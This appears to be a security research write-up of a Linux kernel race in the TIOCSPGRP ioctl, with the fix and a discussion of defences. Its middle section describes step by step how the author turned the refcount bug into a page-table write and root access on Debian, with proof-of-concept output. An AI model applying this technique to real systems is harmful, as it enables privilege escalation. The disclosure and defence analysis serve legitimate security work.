One thing that makes pseudoterminals particularly strange is that both ends of the pseudoterminal have their own struct tty_struct, which point to each other using the link member, even though the device side of the pseudoterminal does not have terminal features like job control - so many of its members are unused.

Many of the ioctls for terminal management can be used on both ends of the pseudoterminal; but no matter on which end you call them, they affect the same state, sometimes with minor differences in behavior. For example, in the ioctl handler for TIOCGPGRP:

/**
 *      tiocgpgrp               -       get process group
 *      @tty: tty passed by user
 *      @real_tty: tty side of the tty passed by the user if a pty else the tty
 *      @p: returned pid
 *
 *      Obtain the process group of the tty. If there is no process group
 *      return an error.
 *
 *      Locking: none. Reference to current->signal->tty is safe.
 */
static int tiocgpgrp(struct tty_struct *tty, struct tty_struct *real_tty, pid_t __user *p)
{
        struct pid *pid;
        int ret;
        /*
         * (tty == real_tty) is a cheap way of
         * testing if the tty is NOT a master pty.
         */
        if (tty == real_tty && current->signal->tty != real_tty)
                return -ENOTTY;
        pid = tty_get_pgrp(real_tty);
        ret =  put_user(pid_vnr(pid), p);
        put_pid(pid);
        return ret;
}

As documented in the comment above, these handlers receive a pointer real_tty that points to the normal terminal device; an additional pointer tty is passed in that can be used to figure out on which end of the terminal the ioctl was originally called. As this example illustrates, the tty pointer is normally only used for things like pointer comparisons. In this case, it is used to prevent TIOCGPGRP from working when called on the terminal side by a process which does not have this terminal as its controlling terminal.

Note: If you want to know more about how terminals and job control are intended to work, the book "The Linux Programming Interface" provides a nice introduction to how these older parts of the userspace API are supposed to work. It doesn't describe any of the kernel internals though, since it's written as a reference for userspace programming. And it's from 2010, so it doesn't have anything in it about new APIs that have showed up over the last decade.

The bug

The bug was in the ioctl handler tiocspgrp:

/**
 *      tiocspgrp               -       attempt to set process group
 *      @tty: tty passed by user
 *      @real_tty: tty side device matching tty passed by user
 *      @p: pid pointer
 *
 *      Set the process group of the tty to the session passed. Only
 *      permitted where the tty session is our session.
 *
 *      Locking: RCU, ctrl lock
 */
static int tiocspgrp(struct tty_struct *tty, struct tty_struct *real_tty, pid_t __user *p)
{
        struct pid *pgrp;
        pid_t pgrp_nr;
[...]
        if (get_user(pgrp_nr, p))
                return -EFAULT;
[...]
        pgrp = find_vpid(pgrp_nr);
[...]
        spin_lock_irq(&tty->ctrl_lock);
        put_pid(real_tty->pgrp);
        real_tty->pgrp = get_pid(pgrp);
        spin_unlock_irq(&tty->ctrl_lock);
[...]
}

The pgrp member of the terminal side (real_tty) is being modified, and the reference counts of the old and new process group are adjusted accordingly using put_pid and get_pid; but the lock is taken on tty, which can be either end of the pseudoterminal pair, depending on which file descriptor we pass to ioctl(). So by simultaneously calling the TIOCSPGRP ioctl on both sides of the pseudoterminal, we can cause data races between concurrent accesses to the pgrp member. This can cause reference counts to become skewed through the following races:

  ioctl(fd1, TIOCSPGRP, pid_A)        ioctl(fd2, TIOCSPGRP, pid_B)
    spin_lock_irq(...)                  spin_lock_irq(...)
    put_pid(old_pid)
                                        put_pid(old_pid)
    real_tty->pgrp = get_pid(A)
                                        real_tty->pgrp = get_pid(B)
    spin_unlock_irq(...)                spin_unlock_irq(...)
  ioctl(fd1, TIOCSPGRP, pid_A)        ioctl(fd2, TIOCSPGRP, pid_B)
    spin_lock_irq(...)                  spin_lock_irq(...)
    put_pid(old_pid)
                                        put_pid(old_pid)
                                        real_tty->pgrp = get_pid(B)
    real_tty->pgrp = get_pid(A)
    spin_unlock_irq(...)                spin_unlock_irq(...)

In both cases, the refcount of the old struct pid is decremented by 1 too much, and either A's or B's is incremented by 1 too much.

Once you understand the issue, the fix seems relatively obvious:

    if (session_of_pgrp(pgrp) != task_session(current))
        goto out_unlock;
    retval = 0;
-   spin_lock_irq(&tty->ctrl_lock);
+   spin_lock_irq(&real_tty->ctrl_lock);
    put_pid(real_tty->pgrp);
    real_tty->pgrp = get_pid(pgrp);
-   spin_unlock_irq(&tty->ctrl_lock);
+   spin_unlock_irq(&real_tty->ctrl_lock);
 out_unlock:
    rcu_read_unlock();
    return retval;

Attack stages

In this section, I will first walk through how my exploit works; afterwards I will discuss different defensive techniques that target these attack stages.

Attack stage: Freeing the object with multiple dangling references

This bug allows us to probabilistically skew the refcount of a struct pid down, depending on which way the race happens: We can run colliding TIOCSPGRP calls from two threads repeatedly, and from time to time that will mess up the refcount. But we don't immediately know how many times the refcount skew has actually happened.

What we'd really want as an attacker is a way to skew the refcount deterministically. We'll have to somehow compensate for our lack of information about whether the refcount was skewed successfully. We could try to somehow make the race deterministic (seems difficult), or after each attempt to skew the refcount assume that the race worked and run the rest of the exploit (since if we didn't skew the refcount, the initial memory corruption is gone, and nothing bad will happen), or we can attempt to find an information leak that lets us figure out the state of the reference count.

On typical desktop/server distributions, the following approach works (unreliably, depending on RAM size) for setting up a freed struct pid with multiple dangling references:

  1. Allocate a new struct pid (by creating a new task).
  2. Create a large number of references to it (by sending messages with SCM_CREDENTIALS to unix domain sockets, and leaving those messages queued up).
  3. Repeatedly trigger the TIOCSPGRP race to skew the reference count downwards, with the number of attempts chosen such that we expect that the resulting refcount skew is bigger than the number of references we need for the rest of our attack, but smaller than the number of extra references we created.
  4. Let the task owning the pid exit and die, and wait for RCU (read-copy-update, a mechanism that involves delaying the freeing of some objects) to settle such that the task's reference to the pid is gone. (Waiting for an RCU grace period from userspace is not a primitive that is intentionally exposed through the UAPI, but there are various ways userspace can do it - e.g. by testing when a released BPF program's memory is subtracted from memory accounting, or by abusing the membarrier(MEMBARRIER_CMD_GLOBAL, ...) syscall after the kernel version where RCU flavors were unified.)
  5. Create a new thread, and let that thread attempt to drop all the references we created.

Because the refcount is smaller at the start of step 5 than the number of references we are about to drop, the pid will be freed at some point during step 5; the next attempt to drop a reference will cause a use-after-free:

struct upid {
        int nr;
        struct pid_namespace *ns;
};

struct pid
{
        atomic_t count;
        unsigned int level;
        /* lists of tasks that use this pid */
        struct hlist_head tasks[PIDTYPE_MAX];
        struct rcu_head rcu;
        struct upid numbers[1];
};
[...]
void put_pid(struct pid *pid)
{
        struct pid_namespace *ns;

        if (!pid)
                return;

        ns = pid->numbers[pid->level].ns;
        if ((atomic_read(&pid->count) == 1) ||
             atomic_dec_and_test(&pid->count)) {
                kmem_cache_free(ns->pid_cachep, pid);
                put_pid_ns(ns);
        }
}

When the object is freed, the SLUB allocator normally replaces the first 8 bytes (sidenote: a different position is chosen starting in 5.7, see Kees' blog) of the freed object with an XOR-obfuscated freelist pointer; therefore, the count and level fields are now effectively random garbage. This means that the load from pid->numbers[pid->level] will now be at some random offset from the pid, in the range from zero to 64 GiB. As long as the machine doesn't have tons of RAM, this will likely cause a kernel segmentation fault. (Yes, I know, that's an absolutely gross and unreliable way to exploit this. It mostly works though, and I only noticed this issue when I already had the whole thing written, so I didn't really want to go back and change it... plus, did I mention that it mostly works?)

Linux in its default configuration, and the configuration shipped by most general-purpose distributions, attempts to fix up unexpected kernel page faults and other types of "oopses" by killing only the crashing thread. Therefore, this kernel page fault is actually useful for us as a signal: Once the thread has died, we know that the object has been freed, and can continue with the rest of the exploit.

If this code looked a bit differently and we were actually reaching a double-free, the SLUB allocator would also detect that and trigger a kernel oops (see set_freepointer() for the CONFIG_SLAB_FREELIST_HARDENED case).

Discarded attack idea: Directly exploiting the UAF at the SLUB level

On the Debian kernel I was looking at, a struct pid in the initial namespace is allocated from the same kmem_cache as struct seq_file and struct epitem - these three slabs have been merged into one by find_mergeable() to reduce memory fragmentation, since their object sizes, alignment requirements, and flags match:

root@deb10:/sys/kernel/slab# ls -l pid
lrwxrwxrwx 1 root root 0 Feb  6 00:09 pid -> :A-0000128
root@deb10:/sys/kernel/slab# ls -l | grep :A-0000128
drwxr-xr-x 2 root root 0 Feb  6 00:09 :A-0000128
lrwxrwxrwx 1 root root 0 Feb  6 00:09 eventpoll_epi -> :A-0000128
lrwxrwxrwx 1 root root 0 Feb  6 00:09 pid -> :A-0000128
lrwxrwxrwx 1 root root 0 Feb  6 00:09 seq_file -> :A-0000128
root@deb10:/sys/kernel/slab# 

A straightforward way to exploit a dangling reference to a SLUB object is to reallocate the object through the same kmem_cache it came from, without ever letting the page reach the page allocator. To figure out whether it's easy to exploit this bug this way, I made a table listing which fields appear at each offset in these three data structures (using pahole -E --hex -C <typename> <path to vmlinux debug info>):

offset pid eventpoll_epi / epitem (RCU-freed) seq_file
0x00 count.counter (4) (CONTROL) rbn.__rb_parent_color (8) (TARGET?) buf (8) (TARGET?)
0x04 level (4)
0x08 tasks[PIDTYPE_PID] (8) rbn.rb_right (8) / rcu.func (8) size (8)
0x10 tasks[PIDTYPE_TGID] (8) rbn.rb_left (8) from (8)
0x18 tasks[PIDTYPE_PGID] (8) rdllink.next (8) count (8)
0x20 tasks[PIDTYPE_SID] (8) rdllink.prev (8) pad_until (8)
0x28 rcu.next (8) next (8) index (8)
0x30 rcu.func (8) ffd.file (8) read_pos (8)
0x38 numbers[0].nr (4) ffd.fd (4) version (8)
0x3c [hole] (4) nwait (4)
0x40 numbers[0].ns (8) pwqlist.next (8) lock (0x20): counter (8)
0x48 --- pwqlist.prev (8)
0x50 --- ep (8)
0x58 --- fllink.next (8)
0x60 --- fllink.prev (8) op (8)
0x68 --- ws (8) poll_event (4)
0x6c --- [hole] (4)
0x70 --- event.events (4) file (8)
0x74 --- event.data (8) (CONTROL)
0x78 --- private (8) (TARGET?)
0x7c --- ---
0x80 --- --- ---

In this case, reallocating the object as one of those three types didn't seem to me like a nice way forward (although it should be possible to exploit this somehow with some effort, e.g. by using count.counter to corrupt the buf field of seq_file). Also, some systems might be using the slab_nomerge kernel command line flag, which disables this merging behavior.

Another approach that I didn't look into here would have been to try to corrupt the obfuscated SLUB freelist pointer (obfuscation is implemented in freelist_ptr()); but since that stores the pointer in big-endian, count.counter would only effectively let us corrupt the more significant half of the pointer, which would probably be a pain to exploit.

Attack stage: Freeing the object's page to the page allocator

This section will refer to some internals of the SLUB allocator; if you aren't familiar with those, you may want to at least look at slides 2-4 and 13-14 of Christoph Lameter's slab allocator overview talk from 2014. (Note that that talk covers three different allocators; the SLUB allocator is what most systems use nowadays.)

The alternative to exploiting the UAF at the SLUB allocator level is to flush the page out to the page allocator (also called the buddy allocator), which is the last level of dynamic memory allocation on Linux (once the system is far enough into the boot process that the memblock allocator is no longer used). From there, the page can theoretically end up in pretty much any context. We can flush the page out to the page allocator with the following steps:

  1. Instruct the kernel to pin our task to a single CPU. Both SLUB and the page allocator use per-cpu structures; so if the kernel migrates us to a different CPU in the middle, we would fail.
  2. Before allocating the victim struct pid whose refcount will be corrupted, allocate a large number of objects to drain partially-free slab pages of all their unallocated objects. If the victim object (which will be allocated in step 5 below) landed in a page that is already partially used at this point, we wouldn't be able to free that page.
  3. Allocate around objs_per_slab * (1+cpu_partial) objects - in other words, a set of objects that completely fill at least cpu_partial pages, where cpu_partial is the maximum length of the "percpu partial list". Those newly allocated pages that are completely filled with objects are not referenced by SLUB's freelists at this point because SLUB only tracks pages with free objects on its freelists.
  4. Fill objs_per_slab-1 more objects, such that at the end of this step, the "CPU slab" (the page from which allocations will be served first) will not contain anything other than free space and fresh allocations (created in this step).
  5. Allocate the victim object (a struct pid). The victim page (the page from which the victim object came) will usually be the CPU slab from step 4, but if step 4 completely filled the CPU slab, the victim page might also be a new, freshly allocated CPU slab.
  6. Trigger the bug on the victim object to create an uncounted reference, and free the object.
  7. Allocate objs_per_slab+1 more objects. After this, the victim page will be completely filled with allocations from steps 4 and 7, and it won't be the CPU slab anymore (because the last allocation can not have fit into the victim page).
  8. Free all allocations from steps 4 and 7. This causes the victim page to become empty, but does not free the page; the victim page is placed on the percpu partial list once a single object from that page has been freed, and then stays on that list.
  9. Free one object per page from the allocations from step 3. This adds all these pages to the percpu partial list until it reaches the limit cpu_partial, at which point it will be flushed: Pages containing some in-use objects are placed on SLUB's per-NUMA-node partial list, and pages that are completely empty are freed back to the page allocator. (We don't free all allocations from step 3 because we only want the victim page to be freed to the page allocator.) Note that this step requires that every objs_per_slab-th object the allocator gave us in step 3 is on a different page.

When the page is given to the page allocator, we benefit from the page being order-0 (4 KiB, native page size): For order-0 pages, the page allocator has special freelists, one per CPU+zone+migratetype combination. Pages on these freelists are not normally accessed from other CPUs, and they don't immediately get combined with adjacent free pages to form higher-order free pages.

At this point we are able to perform use-after-free accesses to some offset inside the free victim page, using codepaths that interpret part of the victim page as a struct pid. Note that at this point, we still don't know exactly at which offset inside the victim page the victim object is located.

Attack stage: Reallocating the victim page as a pagetable

At the point where the victim page has reached the page allocator's freelist, it's essentially game over - at this point, the page can be reused as anything in the system, giving us a broad range of options for exploitation. In my opinion, most defences that act after we've reached this point are fairly unreliable.

One type of allocation that is directly served from the page allocator and has nice properties for exploitation are page tables (which have also been used to exploit Rowhammer). One way to abuse the ability to modify a page table would be to enable the read/write bit in a page table entry (PTE) that maps a file page to which we are only supposed to have read access - for example, this could be used to gain write access to part of a setuid binary's .text segment and overwrite it with malicious code.

We don't know at which offset inside the victim page the victim object is located; but since a page table is effectively an array of 8-byte-aligned elements of size 8 and the victim object's alignment is a multiple of that, as long as we spray all elements of the victim array, we don't need to know the victim object's offset.

To allocate a page table full of PTEs mapping the same file page, we have to:

  • prepare by setting up a 2MiB-aligned memory region (because each last-level page table describes 2MiB of virtual memory) containing single-page mmap() mappings of the same file page (meaning each mapping corresponds to one PTE); then
  • trigger allocation of the page table and fill it with PTEs by reading from each mapping

struct pid has the same alignment as a PTE, and it starts with a 32-bit refcount, so that refcount is guaranteed to overlap the first half of a PTE, which is 64-bit. Because X86 CPUs are little-endian, incrementing the refcount field in the freed struct pid increments the least significant half of the PTE - so it effectively increments the PTE. (Except for the edge case where the least significant half is 0xffffffff, but that's not the case here.)

struct pid: count | level |   tasks[0]  |   tasks[1]  |   tasks[2]  | ... 
pagetable:       PTE      |     PTE     |     PTE     |     PTE     | ...

Therefore we can increment one of the PTEs by repeatedly triggering get_pid(), which tries to increment the refcount of the freed object. This can be turned into the ability to write to the file page as follows:

  • Increment the PTE by 0x42 to set the Read/Write bit and the Dirty bit. (If we didn't set the Dirty bit, the CPU would do it by itself when we write to the corresponding virtual address, so we could also just increment by 0x2 here.)
  • For each mapping, attempt to overwrite its contents with malicious data and ignore page faults.
    • This might throw spurious errors because of outdated TLB entries, but taking a page fault will automatically evict such TLB entries, so if we just attempt the write twice, this can't happen on the second write (modulo CPU migration, as mentioned above).
    • One easy way to ignore page faults is to let the kernel perform the memory write using pread(), which will return -EFAULT on fault.

If the kernel notices the Dirty bit later on, that might trigger writeback, which could crash the kernel if the mapping isn't set up for writing. Therefore, we have to reset the Dirty bit. We can't reliably decrement the PTE because put_pid() inefficiently accesses pid->numbers[pid->level] even when the refcount isn't dropping to zero, but we can increment it by an additional 0x80-0x42=0x3e, which means the final value of the PTE, compared to the initial value, will just have the additional bit 0x80 set, which the kernel ignores.

Afterwards, we launch the setuid executable (which, in the version in the pagecache, now contains the code we injected), and gain root privileges:

user@deb10:~/tiocspgrp$ make
as -o rootshell.o rootshell.S
ld -o rootshell rootshell.o --nmagic
gcc -Wall -o poc poc.c
user@deb10:~/tiocspgrp$ ./poc
starting up...
executing in first level child process, setting up session and PTY pair...
setting up unix sockets for ucreds spam...
draining pcpu and node partial pages
preparing for flushing pcpu partial pages
launching child process
child is 1448
ucreds spam done, struct pid refcount should be lifted. starting to skew refcount...
refcount should now be skewed, child exiting
child exited cleanly
waiting for RCU call...
bpf load with rlim 0x0: -1 (Operation not permitted)
bpf load with rlim 0x1000: 452 (Success)
bpf load success with rlim 0x1000: got fd 452
....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
RCU callbacks executed
gonna try to free the pid...
double-free child died with signal 9 after dropping 9990 references (99%)
hopefully reallocated as an L1 pagetable now
PTE forcibly marked WRITE | DIRTY (hopefully)
clobber via corrupted PTE succeeded in page 0, 128-byte-allocation index 3, returned 856
clobber via corrupted PTE succeeded in page 0, 128-byte-allocation index 3, returned 856
bash: cannot set terminal process group (1447): Inappropriate ioctl for device
bash: no job control in this shell
root@deb10:/home/user/tiocspgrp# id
uid=0(root) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(lpadmin),113(scanner),120(wireshark)
root@deb10:/home/user/tiocspgrp# 

Note that nothing in this whole exploit requires us to leak any kernel-virtual or physical addresses, partly because we have an increment primitive instead of a plain write; and it also doesn't involve directly influencing the instruction pointer.

Defence

This section describes different ways in which this exploit could perhaps have been prevented from working. To assist the reader, the titles of some of the subsections refer back to specific exploit stages from the section above.

Against bugs being reachable: Attack surface reduction

A potential first line of defense against many kernel security issues is to only make kernel subsystems available to code that needs access to them. If an attacker does not have direct access to a vulnerable subsystem and doesn't have sufficient influence over a system component with access to make it trigger the issue, the issue is effectively unexploitable from the attacker's security context.

Pseudoterminals are (more or less) only necessary for interactively serving users who have shell access (or something resembling that), including:

  • terminal emulators inside graphical user sessions
  • SSH servers
  • screen sessions started from various types of terminals

Things like webservers or phone apps won't normally need access to such devices; but there are exceptions. For example:

  • a web server is used to provide a remote root shell for system administration
  • a phone app's purpose is to make a shell available to the user
  • a shell script uses expect to interact with a binary that requires a terminal for input/output

In my opinion, the biggest limits on attack surface reduction as a defensive strategy are:

  1. It exposes a workaround to an implementation concern of the kernel (potential memory safety issues) in user-facing API, which can lead to compatibility issues and maintenance overhead - for example, from a security standpoint, I think it might be a good idea to require phone apps and systemd services to declare their intention to use the PTY subsystem at install time, but that would be an API change requiring some sort of action from application authors, creating friction that wouldn't be necessary if we were confident that the kernel is working properly. This might get especially messy in the case of software that invokes external binaries depending on configuration, e.g. a web server that needs PTY access when it is used for server administration. (This is somewhat less complicated when a benign-but-potentially-exploitable application actively applies restrictions to itself; but not every application author is necessarily willing to design a fine-grained sandbox for their code, and even then, there may be compatibility issues caused by libraries outside the application author's control.)
  2. It can't protect a subsystem from a context that fundamentally needs access to it. (E.g. Android's /dev/binder is directly accessible by Chrome renderers on Android because they have Android code running inside them.)
  3. It means that decisions that ought to not influence the security of a system (making an API that does not grant extra privileges available to some potentially-untrusted context) essentially involve a security tradeoff.

Still, in practice, I believe that attack surface reduction mechanisms (especially seccomp) are currently some of the most important defense mechanisms on Linux.

Against bugs in source code: Compile-time locking validation

The bug in TIOCSPGRP was a fairly straightforward violation of a straightforward locking rule: While a tty_struct is live, accessing its pgrp member is forbidden unless the ctrl_lock of the same tty_struct is held. This rule is sufficiently simple that it wouldn't be entirely unreasonable to expect the compiler to be able to verify it - as long as you somehow inform the compiler about this rule, because figuring out the intended locking rules just from looking at a piece of code can often be hard even for humans (especially when some of the code is incorrect).

When you are starting a new project from scratch, the overall best way to approach this is to use a memory-safe language - in other words, a language that has explicitly been designed such that the programmer has to provide the compiler with enough information about intended memory safety semantics that the compiler can automatically verify them. But for existing codebases, it might be worth looking into how much of this can be retrofitted.

Clang's Thread Safety Analysis feature does something vaguely like what we'd need to verify the locking in this situation:

$ nl -ba -s' ' thread-safety-test.cpp | sed 's|^   ||'
  1 struct __attribute__((capability("mutex"))) mutex {
  2 };
  3 
  4 void lock_mutex(struct mutex *p) __attribute__((acquire_capability(*p)));
  5 void unlock_mutex(struct mutex *p) __attribute__((release_capability(*p)));
  6 
  7 struct foo {
  8     int a __attribute__((guarded_by(mutex)));
  9     struct mutex mutex;
 10 };
 11 
 12 int good(struct foo *p1, struct foo *p2) {
 13     lock_mutex(&p1->mutex);
 14     int result = p1->a;
 15     unlock_mutex(&p1->mutex);
 16     return result;
 17 }
 18 
 19 int bogus(struct foo *p1, struct foo *p2) {
 20     lock_mutex(&p1->mutex);
 21     int result = p2->a;
 22     unlock_mutex(&p1->mutex);
 23     return result;
 24 }
$ clang++ -c -o thread-safety-test.o thread-safety-test.cpp -Wall -Wthread-safety
thread-safety-test.cpp:21:22: warning: reading variable 'a' requires holding mutex 'p2->mutex' [-Wthread-safety-precise]
    int result = p2->a;
                     ^
thread-safety-test.cpp:21:22: note: found near match 'p1->mutex'
1 warning generated.
$ 

However, this does not currently work when compiling as C code because the guarded_by attribute can't find the other struct member; it seems to have been designed mostly for use in C++ code. A more fundamental problem is that it also doesn't appear to have built-in support for distinguishing the different rules for accessing a struct member depending on the lifetime state of the object. For example, almost all objects with locked members will have initialization/destruction functions that have exclusive access to the entire object and can access members without locking. (The lock might not even be initialized in those states.)

Some objects also have more lifetime states; in particular, for many objects with RCU-managed lifetime, only a subset of the members may be accessed through an RCU reference without having upgraded the reference to a refcounted one beforehand. Perhaps this could be addressed by introducing a new type attribute that can be used to mark pointers to structs in special lifetime states? (For C++ code, Clang's Thread Safety Analysis simply disables all checks in all constructor/destructor functions.)

I am hopeful that, with some extensions, something vaguely like Clang's Thread Safety Analysis could be used to retrofit some level of compile-time safety against unintended data races. This will require adding a lot of annotations, in particular to headers, to document intended locking semantics; but such annotations are probably anyway necessary to enable productive work on a complex codebase. In my experience, when there are no detailed comments/annotations on locking rules, every attempt to change a piece of code you're not intimately familiar with (without introducing horrible memory safety bugs) turns into a foray into the thicket of the surrounding call graphs, trying to unravel the intentions behind the code.

The one big downside is that this requires getting the development community for the codebase on board with the idea of backfilling and maintaining such annotations. And someone has to write the analysis tooling that can verify the annotations.

At the moment, the Linux kernel does have some very coarse locking validation via sparse; but this infrastructure is not capable of detecting situations where the wrong lock is used or validating that a struct member is protected by a lock. It also can't properly deal with things like conditional locking, which makes it hard to use for anything other than spinlocks/RCU. The kernel's runtime locking validation via LOCKDEP is more advanced, but mostly with a focus on locking correctness of RCU pointers as well as deadlock detection (the main focus); again, there is no mechanism to, for example,automatically validate that a given struct member is only accessed under a specific lock (which would probably also be quite costly to implement with runtime validation). Also, as a runtime validation mechanism, it can't discover errors in code that isn't executed during testing (although it can combine separately observed behavior into race scenarios without ever actually observing the race).

Against bugs in source code: Global static locking analysis

An alternative approach to checking memory safety rules at compile time is to do it either after the entire codebase has been compiled, or with an external tool that analyzes the entire codebase. This allows the analysis tooling to perform analysis across compilation units, reducing the amount of information that needs to be made explicit in headers. This may be a more viable approach if peppering annotations everywhere across headers isn't viable; but it also reduces the utility to human readers of the code, unless the inferred semantics are made visible to them through some special code viewer. It might also be less ergonomic in the long run if changes to one part of the kernel could make the verification of other parts fail - especially if those failures only show up in some configurations.

I think global static analysis is probably a good tool for finding some subsets of bugs, and it might also help with finding the worst-case depth of kernel stacks or proving the absence of deadlocks, but it's probably less suited for proving memory safety correctness?

Against exploit primitives: Attack primitive reduction via syscall restrictions

(Yes, I made up that name because I thought that capturing this under "Attack surface reduction" is too muddy.)

Because allocator fastpaths (both in SLUB and in the page allocator) are implemented using per-CPU data structures, the ease and reliability of exploits that want to coax the kernel's memory allocators into reallocating memory in specific ways can be improved if the attacker has fine-grained control over the assignment of exploit threads to CPU cores. I'm calling such a capability, which provides a way to facilitate exploitation by influencing relevant system state/behavior, an "attack primitive" here. Luckily for us, Linux allows tasks to pin themselves to specific CPU cores without requiring any privilege using the sched_setaffinity() syscall.

(As a different example, one primitive that can provide an attacker with fairly powerful capabilities is being able to indefinitely stall kernel faults on userspace addresses via FUSE or userfaultfd.)

Just like in the section "Attack surface reduction" above, an attacker's ability to use these primitives can be reduced by filtering syscalls; but while the mechanism and the compatibility concerns are similar, the rest is fairly different:

Attack primitive reduction does not normally reliably prevent a bug from being exploited; and an attacker will sometimes even be able to obtain a similar but shoddier (more complicated, less reliable, less generic, ...) primitive indirectly, for example:

Attack surface reduction is about limiting access to code that is suspected to contain exploitable bugs; in a codebase written in a memory-unsafe language, that tends to apply to pretty much the entire codebase. Attack surface reduction is often fairly opportunistic: You permit the things you need, and deny the rest by default.

Attack primitive reduction limits access to code that is suspected or known to provide (sometimes very specific) exploitation primitives. For example, one might decide to specifically forbid access to FUSE and userfaultfd for most code because of their utility for kernel exploitation, and, if one of those interfaces is truly needed, design a workaround that avoids exposing the attack primitive to userspace. This is different from attack surface reduction, where it often makes sense to permit access to any feature that a legitimate workload wants to use.

A nice example of an attack primitive reduction is the sysctl vm.unprivileged_userfaultfd, which was first introduced so that userfaultfd can be made completely inaccessible to normal users and was then later adjusted so that users can be granted access to part of its functionality without gaining the dangerous attack primitive. (But if you can create unprivileged user namespaces, you can still use FUSE to get an equivalent effect.)

When maintaining lists of allowed syscalls for a sandboxed system component, or something along those lines, it may be a good idea to explicitly track which syscalls are explicitly forbidden for attack primitive reduction reasons, or similarly strong reasons - otherwise one might accidentally end up permitting them in the future. (I guess that's kind of similar to issues that one can run into when maintaining ACLs...)

But like in the previous section, attack primitive reduction also tends to rely on making some functionality unavailable, and so it might not be viable in all situations. For example, newer versions of Android deliberately indirectly give apps access to FUSE through the AppFuse mechanism. (That API doesn't actually give an app direct access to /dev/fuse, but it does forward read/write requests to the app.)

Against oops-based oracles: Lockout or panic on crash

The ability to recover from kernel oopses in an exploit can help an attacker compensate for a lack of information about system state. Under some circumstances, it can even serve as a binary oracle that can be used to more or less perform a binary search for a value, or something like that.

(It used to be even worse on some distributions, where dmesg was accessible for unprivileged users; so if you managed to trigger an oops or WARN, you could then grab the register states at all IRET frames in the kernel stack, which could be used to leak things like kernel pointers. Luckily nowadays most distributions, including Ubuntu 20.10, restrict dmesg access.)

Android and Chrome OS nowadays set the kernel's panic_on_oops flag, meaning the machine will immediately restart when a kernel oops happens. This makes it hard to use oopsing as part of an exploit, and arguably also makes more sense from a reliability standpoint - the system will be down for a bit, and it will lose its existing state, but it will also reset into a known-good state instead of continuing in a potentially half-broken state, especially if the crashing thread was holding mutexes that can never again be released, or things like that. On the other hand, if some service crashes on a desktop system, perhaps that shouldn't cause the whole system to immediately go down and make you lose unsaved state - so panic_on_oops might be too drastic there.

A good solution to this might require a more fine-grained approach. (For example, grsecurity has for a long time had the ability to lock out specific UIDs that have caused crashes.) Perhaps it would make sense to allow the init daemon to use different policies for crashes in different services/sessions/UIDs?

Against UAF access: Deterministic UAF mitigation

One defense that would reliably stop an exploit for this issue would be a deterministic use-after-free mitigation. Such a mitigation would reliably protect the memory formerly occupied by the object from accesses through dangling pointers to the object, at least once the memory has been reused for a different purpose (including reuse to store heap metadata). For write operations, this probably requires either atomicity of the access check and the actual write or an RCU-like delayed freeing mechanism. For simple read operations, it can also be implemented by ordering the access check after the read, but before the read value is used.

A big downside of this approach on its own is that extra checks on every memory access will probably come with an extremely high efficiency penalty, especially if the mitigation can not make any assumptions about what kinds of parallel accesses might be happening to an object, or what semantics pointers have. (The proof-of-concept implementation I presented at LSSNA 2020 (slides, recording) had CPU overhead roughly in the range 60%-159% in kernel-heavy benchmarks, and ~8% for a very userspace-heavy benchmark.)

Unfortunately, even a deterministic use-after-free mitigation often won't be enough to deterministically limit the blast radius of something like a refcounting mistake to the object in which it occurred. Consider a case where two codepaths concurrently operate on the same object: Codepath A assumes that the object is live and subject to normal locking rules. Codepath B knows that the reference count reached zero, assumes that it therefore has exclusive access to the object (meaning all members are mutable without any locking requirements), and is trying to tear down the object. Codepath B might then start dropping references the object was holding on other objects while codepath A is following the same references. This could then lead to use-after-frees on pointed-to objects. If all data structures are subject to the same mitigation, this might not be too much of a problem; but if some data structures (like struct page) are not protected, it might permit a mitigation bypass.

Similar issues apply to data structures with union members that are used in different object states; for example, here's some random kernel data structure with an rcu_head in a union (just a random example, there isn't anything wrong with this code as far as I know):

struct allowedips_node {
    struct wg_peer __rcu *peer;
    struct allowedips_node __rcu *bit[2];
    /* While it may seem scandalous that we waste space for v4,
     * we're alloc'ing to the nearest power of 2 anyway, so this
     * doesn't actually make a difference.
     */
    u8 bits[16] __aligned(__alignof(u64));
    u8 cidr, bit_at_a, bit_at_b, bitlen;

    /* Keep rarely used list at bottom to be beyond cache line. */
    union {
        struct list_head peer_list;
        struct rcu_head rcu;
    };
};

As long as everything is working properly, the peer_list member is only used while the object is live, and the rcu member is only used after the object has been scheduled for delayed freeing; so this code is completely fine. But if a bug somehow caused the peer_list to be read after the rcu member has been initialized, type confusion would result.

In my opinion, this demonstrates that while UAF mitigations do have a lot of value (and would have reliably prevented exploitation of this specific bug), a use-after-free is just one possible consequence of the symptom class "object state confusion" (which may or may not be the same as the bug class of the root cause). It would be even better to enforce rules on object states, and ensure that an object e.g. can't be accessed through a "refcounted" reference anymore after the refcount has reached zero and has logically transitioned into a state like "non-RCU members are exclusively owned by thread performing teardown" or "RCU callback pending, non-RCU members are uninitialized" or "exclusive access to RCU-protected members granted to thread performing teardown, other members are uninitialized". Of course, doing this as a runtime mitigation would be even costlier and messier than a reliable UAF mitigation; this level of protection is probably only realistic with at least some level of annotations and static validation.

Against UAF access: Probabilistic UAF mitigation; pointer leaks

Summary: Some types of probabilistic UAF mitigation break if the attacker can leak information about pointer values; and information about pointer values easily leaks to userspace, e.g. through pointer comparisons in map/set-like structures.

If a deterministic UAF mitigation is too costly, an alternative is to do it probabilistically; for example, by tagging pointers with a small number of bits that are checked against object metadata on access, and then changing that object metadata when objects are freed.

The downside of this approach is that information leaks can be used to break the protection. One example of a type of information leak that I'd like to highlight (without any judgment on the relative importance of this compared to other types of information leaks) are intentional pointer comparisons, which have quite a few facets.

A relatively straightforward example where this could be an issue is the kcmp() syscall. This syscall compares two kernel objects using an arithmetic comparison of their permuted pointers (using a per-boot randomized permutation, see kptr_obfuscate()) and returns the result of the comparison (smaller, equal or greater). This gives userspace a way to order handles to kernel objects (e.g. file descriptors) based on the identities of those kernel objects (e.g. struct file instances), which in turn allows userspace to group a set of such handles by backing kernel object in O(n*log(n)) time using a standard sorting algorithm.

